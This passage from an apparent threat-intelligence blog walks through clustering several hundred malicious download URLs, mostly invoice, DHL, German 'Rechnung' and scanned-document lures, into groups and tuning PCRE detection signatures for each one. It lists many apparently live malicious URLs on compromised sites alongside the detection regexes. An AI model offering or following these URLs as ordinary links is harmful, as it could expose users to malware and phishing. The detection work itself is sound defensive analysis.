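    return (m.group(2), m.group(3))


results = [describe(u) for u in samples]
for url, result in zip(samples, results):
    print(url, "->", result)
```

Only the ".doc" sample uses the optional 5-character segment here, which fits the hunch that the two extensions may turn out to be separate campaigns.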


The pcre_check output shows decent coverage improvements.

[+] FOUND [+]
Count: 93/696 (+27)
Comment: [Group 01] - [ t5wx-x064-mzdb ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-zA-Z0-9]{4,5}-[a-zA-Z]{1,5}\/$

[+] FOUND [+]
Count: 89/696 (+9)
Comment: [Group 02] - [ INVOICE-864339-98261 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}(-)?[0-9]{4,5}\/$

[+] FOUND [+]
Count: 190/696
Comment: [Group 03] - [ H27560xzwsS ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$

[+] FOUND [+]
Count: 56/696 (+26)
Comment: [Group 04] - [ RRT-13279129.dokument ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$

[+] FOUND [+]
Count: 79/696 (+20)
Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-(document|doc)-May-[0-9]{2}-2017\/$

[+] FOUND [+]
Count: 62/696
Comment: [Group 06] - [ download2467 ]
PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

[+] FOUND [+]
Count: 43/696 (+28)
Comment: [Group 07] - [ LUqc663BAyN333-HoO ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$

[+] FOUND [+]
Count: 10/696 (+7)
Comment: [Group 08] - [ NUDA-X-52454-DE ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$

[+] FOUND [+]
Count: 31/696 (+11)
Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-(Document|XI|VT)((-[A-Z]{2,3})?-[0-9]{2})?-[A-Z0-9]{7,10}\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 10] - [ zp3x-r88-wuh.view ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{5})?-[a-z]{2,3}\.(view|doc)\/$

Round 4

The next 20 sites.

http://pinoypiper.com/Sz1Mr-H23-Xw/
http://proiecte-pac.ro/ORDER.-5883789520/
http://proprints.dk/Rech-74779857260/
http://pulmad.ee/B6y-Fb95-NMW/
http://redkitecottages.com/Cust-Document-VMH-46-TJ804065/
http://reichertgroup.com/d0r-tl410-cxa/
http://sgbusiness.co.uk/YM-57911235-document-May-03-2017/
http://sign1.no/dhl___status___2668292851/
http://sloan3d.com/Cust-Document-WMV-26-EW054554/
http://stacibockman.com/g2c-o179-pocja/
http://streamingair.com/i0A-St59-m/
http://sublevel3.us/G7n-Gh58-y/
http://superalumnos.net/php/ORDER.-HW-84-Y947883/
http://technetemarketing.com/CUST.-8520279770/
http://teed.ru/YG-47124992/bc7za-l30-v.view/
http://texasbrits.com/m3s-r623-x/
http://thegilbertlawoffice.com/m-9q-d054-gu.doc/
http://thenursesagent.com/ORDER.-9592209302/
http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/
http://tscoaching.co.uk/l1R-q60-pe/

One new variant sticks out, otherwise business as usual.

[Group 01] - [ t5wx-x064-mzdb ]

http://pinoypiper.com/Sz1Mr-H23-Xw/
http://pulmad.ee/B6y-Fb95-NMW/
http://reichertgroup.com/d0r-tl410-cxa/
http://stacibockman.com/g2c-o179-pocja/
http://streamingair.com/i0A-St59-m/
http://sublevel3.us/G7n-Gh58-y/
http://texasbrits.com/m3s-r623-x/
http://transfinity.co.uk/sam/fathers-day/htdocs/b2m-qp699-jxmln/
http://tscoaching.co.uk/l1R-q60-pe/

Half of the 20 are for this group. Just some small range adjustments.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,7}-[a-zA-Z0-9]{4,5}-[a-zA-Z]{1,5}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$

[Group 02] - [ INVOICE-864339-98261 ]

http://proiecte-pac.ro/ORDER.-5883789520/
http://proprints.dk/Rech-74779857260/
http://technetemarketing.com/CUST.-8520279770/
http://thenursesagent.com/ORDER.-9592209302/

It should be apparent now that Group 2 and 9 have a bit of overlap. I was going to wait till the end to course correct; however, I feel it's just too much at this point, so I'm going to split things up: the URL's above, along with the ones previously matched in both groups, that have the "ORDER" and "CUST" strings followed by 10 digits will become a new, unique group. That means I need to edit Group 2 and 9 to avoid these, and the simplest way of doing that is to stop treating the second dash as optional and make it required again. See Group 9 and 12 for further iteration details.

OLD: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}(-)?[0-9]{4,5}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]

http://sgbusiness.co.uk/YM-57911235-document-May-03-2017/

This new one breaks from the two parts separated by a dash. I can add the dash to the character list and up the range, or I can opt for an optional grouping and up the range. I'm going to do the latter because it keeps the structure intact; for this, I'm not as worried about FP's due to the ending part of the pattern being fairly unique.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{3,5}-[0-9]{2}-[0-9]{5}-(document|doc)-May-[0-9]{2}-2017\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$
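A short sketch of that change, again with Python's re module standing in for PCRE. Both URL's are from the sample lists in earlier rounds; the variable names are only for illustration.

```python
import re

PREFIX = r"^http:\/\/([^\x2F]+\/)+"
TAIL = r"-(document|doc)-May-[0-9]{2}-2017\/$"

# OLD: the two-digit part and the five-digit part are both mandatory.
OLD = re.compile(PREFIX + r"[A-Z]{3,5}-[0-9]{2}-[0-9]{5}" + TAIL)
# NEW: the two-digit part is an optional group and the numeric run is longer.
NEW = re.compile(PREFIX + r"[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}" + TAIL)

two_part = "http://tiger12.com/TGA-48-76252-doc-May-04-2017/"
one_part = "http://sgbusiness.co.uk/YM-57911235-document-May-03-2017/"

old_results = (bool(OLD.search(two_part)), bool(OLD.search(one_part)))
new_results = (bool(NEW.search(two_part)), bool(NEW.search(one_part)))
# Group 2 holds the optional "-NN" chunk when it is present.
optional_chunks = (NEW.search(two_part).group(2), NEW.search(one_part).group(2))
print("OLD:", old_results)
print("NEW:", new_results)
print("optional chunk:", optional_chunks)
```

The dashes stay as fixed anchors in the NEW pattern, which is the structural benefit of the optional group over simply adding "-" to a character class.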

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://redkitecottages.com/Cust-Document-VMH-46-TJ804065/
http://sloan3d.com/Cust-Document-WMV-26-EW054554/
http://superalumnos.net/php/ORDER.-HW-84-Y947883/

Similar to Group 2, I'm going to reverse course on the optional groupings so that the 10 digits are not captured. To account for the new variants in Group 9, I'm adding an optional grouping for the period after the first word and for the "Document" string, then moving the others back into the A-Z grouping that followed.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER)\.-(Document|XI|VT)((-[A-Z]{2,3})?-[0-9]{2})?-[A-Z0-9]{7,10}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)(.)?(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$
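One detail worth checking in the NEW pattern: the "(.)?" group uses an unescaped dot, which in regex means "any single character" rather than a literal period. The sketch below compares it with an escaped variant, "(\.)?", which is my own suggested tightening and not part of the patterns used for the counts in this post. The example.com URL is made up; Python's re module stands in for PCRE.

```python
import re

PREFIX = r"^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)"
TAIL = r"(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$"

AS_WRITTEN = re.compile(PREFIX + r"(.)?" + TAIL)   # dot = any character
ESCAPED = re.compile(PREFIX + r"(\.)?" + TAIL)     # dot = literal period

samples = [
    "http://redkitecottages.com/Cust-Document-VMH-46-TJ804065/",
    "http://superalumnos.net/php/ORDER.-HW-84-Y947883/",
    "http://wlrents.com/CUST.-Document-YDI-04-GQ389557/",
]
# Hypothetical URL with a stray letter where the period would go.
stray = "http://example.com/CUSTX-AB-12-ABCDEFG/"

as_written_hits = [u for u in samples if AS_WRITTEN.search(u)]
escaped_hits = [u for u in samples if ESCAPED.search(u)]
print(len(as_written_hits), len(escaped_hits))
print(bool(AS_WRITTEN.search(stray)), bool(ESCAPED.search(stray)))
```

On these three samples the two variants behave the same, so escaping the dot would be a candidate tweak to weigh during FP testing rather than a required change.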

[Group 10] - [ zp3x-r88-wuh.view ]


Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{5})?-[a-z]{2,3}\.(view|doc)\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{4,5})?-[a-z]{2,3}\.(view|doc)\/$

[Group 11] - [ dhl___status___2668292851 ]

http://sign1.no/dhl___status___2668292851/

Not much to work with yet so it's fairly static.


[Group 12] - [ ORDER.-5883789520 ]

Previous set:
http://thesubservice.com/ORDER.-Document-9543529814/
http://toppprogramming.com/Cust-8328499631/

Current set:
http://proiecte-pac.ro/ORDER.-5883789520/
http://proprints.dk/Rech-74779857260/
http://technetemarketing.com/CUST.-8520279770/
http://thenursesagent.com/ORDER.-9592209302/

Looking at the data in Group 2 and 9, this pattern will have: string grouping of "ORDER", "Rech", "CUST", "Cust", optional period, dash, optional "Document" string, 10-11 numbers. By the way, "rech" is shorthand for "rechnung", which is German for "bill" - you see these variations quite a bit in phishing campaigns as they focus on different regions.
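To sanity check the split, the sketch below runs the six URL's through the Group 12 PCRE and through the Group 2 PCRE with its required second dash, both as they appear in the pcre_check output for this round. Python's re module stands in for PCRE here.

```python
import re

GROUP_12 = re.compile(
    r"^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust)(.)?(-Document)?-[0-9]{10,11}\/$"
)
GROUP_02 = re.compile(
    r"^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$"
)

urls = [
    "http://thesubservice.com/ORDER.-Document-9543529814/",
    "http://toppprogramming.com/Cust-8328499631/",
    "http://proiecte-pac.ro/ORDER.-5883789520/",
    "http://proprints.dk/Rech-74779857260/",
    "http://technetemarketing.com/CUST.-8520279770/",
    "http://thenursesagent.com/ORDER.-9592209302/",
]

group_12_hits = [u for u in urls if GROUP_12.search(u)]
group_02_hits = [u for u in urls if GROUP_02.search(u)]
print("Group 12:", len(group_12_hits), "Group 02:", len(group_02_hits))
```

All six land in the new group and none in Group 2, so the two patterns no longer overlap on these samples.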


Next iteration below.

[+] FOUND [+]
Count: 127/696 (+34)
Comment: [Group 01] - [ t5wx-x064-mzdb ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$

[+] FOUND [+]
Count: 80/696 (-9)
Comment: [Group 02] - [ INVOICE-864339-98261 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[+] FOUND [+]
Count: 190/696
Comment: [Group 03] - [ H27560xzwsS ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$

[+] FOUND [+]
Count: 56/696
Comment: [Group 04] - [ RRT-13279129.dokument ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$

[+] FOUND [+]
Count: 86/696 (+7)
Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$

[+] FOUND [+]
Count: 62/696
Comment: [Group 06] - [ download2467 ]
PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

[+] FOUND [+]
Count: 43/696
Comment: [Group 07] - [ LUqc663BAyN333-HoO ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$

[+] FOUND [+]
Count: 10/696
Comment: [Group 08] - [ NUDA-X-52454-DE ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$

[+] FOUND [+]
Count: 36/696 (+5)
Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)(.)?(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 10] - [ zp3x-r88-wuh.view ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{4,5})?-[a-z]{2,3}\.(view|doc)\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 11] - [ dhl___status___2668292851 ]
PCRE: ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$

[+] FOUND [+]
Count: 31/696
Comment: [Group 12] - [ ORDER.-5883789520 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust)(.)?(-Document)?-[0-9]{10,11}\/$

Round 5

Since there are only 31 URL's left I'm just going to add them all here and close out this phase.

http://akhmerov.com/AuHffUo4L1BcEmca0BW5e4UtI/ http://albrightfinancial.com/gescanntes-Dokument-66764196575/ http://anjep.com/TBWEV-YCAP-91327-DE/ http://arroyave.net/Rech-K-682-GO1130/ http://beowulf7.com/kgcee/ http://bitach.com/RIJW-FNFE-86299-DE/ http://bobrow.com/ito-6r-w193-pkr.doc/ http://boningue.com/g843enx500-Jh/ http://carriedavenport.com/Scan-58146582290/ http://davidberman.com/gescanntes-Dokument-85218870046/ http://dentaltravelpoland.co.uk/NUN-63376893/b4fe-nn88-s.view/ http://donnjo.com/Rechnung-IOOY-776-LUV2894/ http://frossweddingcollections.co.uk/qdu-7p-wi523-hgnt.doc/ http://froufrouandthomas.co.uk/c644kNg297-uy/ http://gabrielramos.com.br/lxu-3h-ip079-zgmg.doc/ http://genxvisual.com/U494KHq064-VK/ http://gestion-arte.com.ar/CLCJY-EMIE-76216-DE/ http://imnet.ro/gcxbh/ http://johncarta.com/jexaag/ http://kowalenko.ca/D603ImA780-xxJ/ http://kratiroff.com/Scan-62799108494/ http://lapetitenina.com/eyym/ http://magmaprod.com.br/FcmUZ9GGTFaq2SYC5HTuFgc4v7/ http://masmp.com/rby-4c-rp108-sqq.doc/ http://missgypsywhitemoon.com.au/ismpce/ http://music111.com/VAQT-DYBC-27274-DE/ http://myhorses.ca/lb8TApg9aZI6PP5RWRAIdmfU/ http://onlineme.w04.wh-2.com/LD-36666076/ir5r-mu75-h.view/ http://phoneworx.co.uk/HLqwOU1uNQ7rWLWkXW6VoMheZf/ http://teed.ru/YG-47124992/bc7za-l30-v.view/ http://thegilbertlawoffice.com/m-9q-d054-gu.doc/

[Group 03] - [ H27560xzwsS ]

http://akhmerov.com/AuHffUo4L1BcEmca0BW5e4UtI/ http://beowulf7.com/kgcee/ http://imnet.ro/gcxbh/ http://johncarta.com/jexaag/ http://lapetitenina.com/eyym/ http://magmaprod.com.br/FcmUZ9GGTFaq2SYC5HTuFgc4v7/ http://myhorses.ca/lb8TApg9aZI6PP5RWRAIdmfU/ http://phoneworx.co.uk/HLqwOU1uNQ7rWLWkXW6VoMheZf/

I'll adjust the ranges on this one but you can see from the above that it looks like two distinct campaigns. I have no doubt now that there will be more in this grouping but, since it's already close to 200 URL's, I'll review the entire set at the end.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{7,23}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,26}\/$

[Group 07] - [ LUqc663BAyN333-HoO ]

http://boningue.com/g843enx500-Jh/ http://froufrouandthomas.co.uk/c644kNg297-uy/ http://genxvisual.com/U494KHq064-VK/ http://kowalenko.ca/D603ImA780-xxJ/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{11,15}-[a-zA-Z]{1,3}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{10,15}-[a-zA-Z]{1,3}\/$

[Group 08] - [ NUDA-X-52454-DE ]

http://anjep.com/TBWEV-YCAP-91327-DE/ http://bitach.com/RIJW-FNFE-86299-DE/ http://gestion-arte.com.ar/CLCJY-EMIE-76216-DE/ http://music111.com/VAQT-DYBC-27274-DE/

Range adjustment. Curious these all end with "DE" too, possibly region based given the "Rech" stuff seen previously; will follow-up after.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,3}-[0-9]{5}-[A-Z]{2}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-[A-Z]{2}\/$

[Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]

http://arroyave.net/Rech-K-682-GO1130/ http://donnjo.com/Rechnung-IOOY-776-LUV2894/

Added "Rech" and "Rechnung" to initial string grouping along with expanding some ranges.

OLD: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust)(.)?(-Document)?-[A-Z]{2,3}-[0-9]{2}-[A-Z0-9]{7,10}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z0-9]{6,10}\/$

[Group 10] - [ zp3x-r88-wuh.view ]

http://bobrow.com/ito-6r-w193-pkr.doc/ http://dentaltravelpoland.co.uk/NUN-63376893/b4fe-nn88-s.view/ http://frossweddingcollections.co.uk/qdu-7p-wi523-hgnt.doc/ http://gabrielramos.com.br/lxu-3h-ip079-zgmg.doc/ http://masmp.com/rby-4c-rp108-sqq.doc/ http://onlineme.w04.wh-2.com/LD-36666076/ir5r-mu75-h.view/ http://teed.ru/YG-47124992/bc7za-l30-v.view/ http://thegilbertlawoffice.com/m-9q-d054-gu.doc/

Range adjustment.

OLD: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,4}-[a-z0-9]{3,4}(-[a-z0-9]{4,5})?-[a-z]{2,3}\.(view|doc)\/$
NEW: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$

[Group 12] - [ ORDER.-5883789520 ]

http://albrightfinancial.com/gescanntes-Dokument-66764196575/ http://carriedavenport.com/Scan-58146582290/ http://davidberman.com/gescanntes-Dokument-85218870046/ http://kratiroff.com/Scan-62799108494/

Added "gescanntes" (German for "scanned") and "Scan" to the initial string grouping. Added "Dokument" to the second optional grouping.

OLD: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust)(.)?(-Document)?-[0-9]{10,11}\/$
NEW: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$

Alright, now I've cleared all of the remaining matches.

[+] FOUND [+]
Count: 127/696
Comment: [Group 01] - [ t5wx-x064-mzdb ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{3,7}-[a-zA-Z0-9]{3,5}-[a-zA-Z]{1,5}\/$

[+] FOUND [+]
Count: 80/696
Comment: [Group 02] - [ INVOICE-864339-98261 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(INVOICE|ORDER|CUST|Invoice|Cust)-[0-9]{6,7}-[0-9]{4,5}\/$

[+] FOUND [+]
Count: 199/696 (+9)
Comment: [Group 03] - [ H27560xzwsS ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,26}\/$

[+] FOUND [+]
Count: 56/696
Comment: [Group 04] - [ RRT-13279129.dokument ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,3}-[0-9]{8}\.dokument\/$

[+] FOUND [+]
Count: 86/696
Comment: [Group 05] - [ EDHFR-08-77623-document-May-04-2017 ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{2,5}(-[0-9]{2})?-[0-9]{5,10}-(document|doc)-May-[0-9]{2}-2017\/$

[+] FOUND [+]
Count: 62/696
Comment: [Group 06] - [ download2467 ]
PCRE: ^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$

[+] FOUND [+]
Count: 47/696 (+4)
Comment: [Group 07] - [ LUqc663BAyN333-HoO ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{10,15}-[a-zA-Z]{1,3}\/$

[+] FOUND [+]
Count: 14/696 (+4)
Comment: [Group 08] - [ NUDA-X-52454-DE ]
PCRE: ^http:\/\/([^\x2F]+\/)+[A-Z]{4,5}-[A-Z]{1,4}-[0-9]{5}-[A-Z]{2}\/$

[+] FOUND [+]
Count: 38/696 (+2)
Comment: [Group 09] - [ CUST.-Document-YDI-04-GQ389557 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(CUST|ORDER|Cust|Rech|Rechnung)(.)?(-Document)?-[A-Z]{1,4}-[0-9]{2,3}-[A-Z0-9]{6,10}\/$

[+] FOUND [+]
Count: 11/696 (+1)
Comment: [Group 10] - [ zp3x-r88-wuh.view ]
PCRE: ^http:\/\/([^\x2F]+\/)+[a-z0-9]{1,5}-[a-z0-9]{2,4}(-[a-z0-9]{4,5})?-[a-z]{1,4}\.(view|doc)\/$

[+] FOUND [+]
Count: 3/696
Comment: [Group 11] - [ dhl___status___2668292851 ]
PCRE: ^http:\/\/([^\x2F]+\/)+dhl___status___[0-9]{10}\/$

[+] FOUND [+]
Count: 35/696 (+4)
Comment: [Group 12] - [ ORDER.-5883789520 ]
PCRE: ^http:\/\/([^\x2F]+\/)+(ORDER|Rech|CUST|Cust|gescanntes|Scan)(.)?(-Document|-Dokument)?-[0-9]{10,11}\/$

Round 6

The next step is to validate the matches with the "-s" flag in pcre_check. This will show all of the respective matches under each PCRE. For this phase, I just eyeball it to make sure there is no overlap and what's expected in each group is present.

All of the PCRE's look solid except Group 3, which I already mentioned would need more TLC, as it overlaps with other PCRE's.
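The overlap check can also be approximated in code rather than by eye. Below is a minimal sketch, assuming Python's re module is an acceptable stand-in for PCRE for these simple patterns; find_overlaps is a hypothetical helper and not part of pcre_check, and the second URL uses a made-up host.

```python
import re

# Two patterns from the Round 5 output. Python's re is used as a stand-in
# for PCRE here (an assumption that holds for these simple patterns).
PATTERNS = {
    "Group 03": r"^http:\/\/([^\x2F]+\/)+[a-zA-Z0-9]{4,26}\/$",
    "Group 06": r"^http:\/\/([^\x2F]+\/)+download[0-9]{4}\/$",
}


def find_overlaps(urls, patterns):
    """Return {url: [group, ...]} for URLs matched by more than one pattern."""
    compiled = {name: re.compile(rx) for name, rx in patterns.items()}
    overlaps = {}
    for url in urls:
        hits = [name for name, rx in compiled.items() if rx.search(url)]
        if len(hits) > 1:
            overlaps[url] = hits
    return overlaps


urls = [
    "http://beowulf7.com/kgcee/",        # from the Round 5 list
    "http://example.com/download2467/",  # hypothetical host, Group 06 style path
]
overlaps = find_overlaps(urls, PATTERNS)
for url, groups in overlaps.items():
    print(url, groups)
```

The broad Group 3 range swallows the Group 6 style path as well, which is the kind of overlap that makes Group 3 a candidate for splitting up.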

For Group 3, I'm going to visually break these down. I'll put 5 examples under each sub-grouping to show how I separated them. Some are very good for matching while others will just have to be left behind. TAKE NOTE BAD GUYS, BEING GENERIC IS GOOD, UNIQUE SNOWFLAKES ARE THE FIRST AGAINST THE WALL.

[Group 03] - [ dhl/paket/com/pkp/appmanager/8376315127 ]

http://8kindsoffun.com/dhl/paket/com/pkp/appmanager/8376315127/ http://balletopia.org/dhl/paket/com/pkp/appmanager/7293445574/ http://cnwconsultancy.com/dhl/paket/com/pkp/appmanager/0622636111/ http://cookieco.com/dhl/paket/com/pkp/appmanager/8333287922/ http://cspdx.com/dhl/paket/com/pkp/appmanager/6213914600/

I think this one would have stood out earlier had it not been clobbered by the previous PCRE. The path is very unique and ends with 10 digits. This PCRE will replace the old one for Group 3 and the other new ones will start at Group 13.


[Group 13] - [ 6572646300 ]

http://alfareklama.cz/6572646300/ http://algicom.net/6673413599/ http://bourdin.name/0014489972/ http://carbitech.net/dhl/2354409458/ http://dsltech.co.uk/0217183208/ ... http://oscartvazquez.com/DHL24/15382203695/

I'm going to create a PCRE for this one but I don't expect it to live past the FP check. One entry stands apart from the rest with 11 digits instead of 10 - it may be that I just don't have enough samples to account for that campaign. Finally, I'll need to exclude the previous set of matches, which also end with 10 digits. To do this, I'll use a negative lookbehind so that the digits only match when they are not directly preceded by "appmanager/" in the URL path.
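To show what the negative lookbehind buys, here is a small sketch using the Group 13 pattern with Python's re module standing in for PCRE (an assumption; the lookbehind is fixed-width, so re accepts it). The URLs are taken from the Group 3 and Group 13 samples above.

```python
import re

# Group 13 pattern: 10-11 digits as the last path segment, unless that
# segment directly follows "appmanager/".
GROUP_13 = re.compile(r"^http:\/\/([^\x2F]+\/)+(?<!appmanager\/)[0-9]{10,11}\/$")

should_match = [
    "http://alfareklama.cz/6572646300/",
    "http://carbitech.net/dhl/2354409458/",
    "http://oscartvazquez.com/DHL24/15382203695/",  # the 11-digit outlier
]
should_not_match = [
    "http://8kindsoffun.com/dhl/paket/com/pkp/appmanager/8376315127/",
]

for url in should_match + should_not_match:
    print(bool(GROUP_13.search(url)), url)
```

The lookbehind is evaluated at the position where the digits start, so it only inspects the path segment immediately before them.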


[ alpha(lower) ]

http://aifesdespets.fr/kkrxtsmodw/ http://beowulf7.com/kgcee/ http://bunngalow.com/injeutznnb/ http://carbofilms.com/cms/wp-content/upgrade/jcnfkvken/ http://dolphinrunvb.com/yozypdznpb/

I don't see any good patterns in this set or the next one.

[ alpha(lower)numeric ]

http://benard.ca/z49641l/ http://jaqua.us/hid4kiwcvd84fljkpqpl/ http://krakhud.pl/rguen0ebxndrci41frworbr/ http://micromatrices.com/qwh7zxijifxsnxg20mlwa/ http://patu.ch/bgrvm2wqpjw74hz/

[Group 14] [ SCANNED/RZ7498WEXEZB ]

http://icaredentalstudio.com/APE88743TZ/ http://lbcd.se/MFV09235UA/ http://lucasliftruck.com/SCANNED/RZ7498WEXEZB/ http://meanconsulting.com/K44975X/ http://sentios.lt/W95941C/ http://triadesolucoes.com.br/SCANNED/RBA6517MHPKCZDEX/ http://xyphoid.com/SCANNED/MM3431UCNPCEZRO/ http://zahahadidmiami.com/K38258Q/

This group was characterized by alpha(upper)numeric, which normally wouldn't be worth pattern matching, but I can see two patterns in the above that may be worth entertaining. For Group 14, I'll match on the URL's with "SCANNED" string in the path and the unique placement of the digits within the string: 2-3 alpha(upper), 4 digits, 6-9 alpha(upper).


[Group 15] [ K44975X ]

http://meanconsulting.com/K44975X/ http://sentios.lt/W95941C/ http://zahahadidmiami.com/K38258Q/

For Group 15, I'll match on 1 alpha(upper), 5 digits, 1 alpha(upper). The non-matched ones in the previous Group 14 may be an expanded part of this campaign but it's such a weak PCRE and prone to FP that I'm not going to bother with it. It's highly likely to not make the final cut either way.


[ alphanumeric long 18-26 ]

http://akhmerov.com/AuHffUo4L1BcEmca0BW5e4UtI/ http://arosa.nl/crm/xs2ckmwotgcml95cxdhbo/ http://crosslink.ca/nWlKL3PdKyi1goahyZfbNr/ http://ideaswebstudio.com/v3mzbzaink00sndmyz/ http://infojass.com/gvtsl7ddrnjkupn50pp/

Nothing jumps out at me that would make for a good PCRE. It has a similar structure of alpha, digit, alpha but the ranges are very broad which makes it highly prone to FP again.

[ alphanumeric short 7-14 ]

http://akirmak.com/QhS33472le/ http://austinaaron.com/eCjH94174LaN/ http://campanus.cz/N6571iwA/ http://carolsgardeninn.com/vX94098JvVJ/ http://cdoprojectgraduation.com/eaSz15612O/ ... http://www.alfredomartinez.com.mx/Afz3999lDtz/ http://www.kreodesign.pl/test/O77405ccSC/ http://www.prodzakaz.com.ua/H27560xzwsS/ http://www.voloskof.net/Sn83160EngQs/ http://zonasacra.com/zH83293YizhQ/

This next one follows the same pattern I identified for Group 15, just with wider ranges: 1-4 alpha, 4-5 digits, 1-5 alpha. I'll just update Group 15 and see how it fares in the FP check but, for what it's worth, it does match every single entry in this category, which had 30+.

OLD: ^http:\/\/([^\x2F]+\/)+[A-Z]{1}[0-9]{5}[A-Z]{1}\/$
NEW: ^http:\/\/([^\x2F]+\/)+[A-Za-z]{1,4}[0-9]{4,5}[a-zA-Z]{1,5}\/$


Now that everything is clustered together, I'll do one final visual inspection to see if any other patterns jump out that allow us to tighten the rules up and avoid FP's.

[Group 01] - [ t5wx-x064-mzdb ]

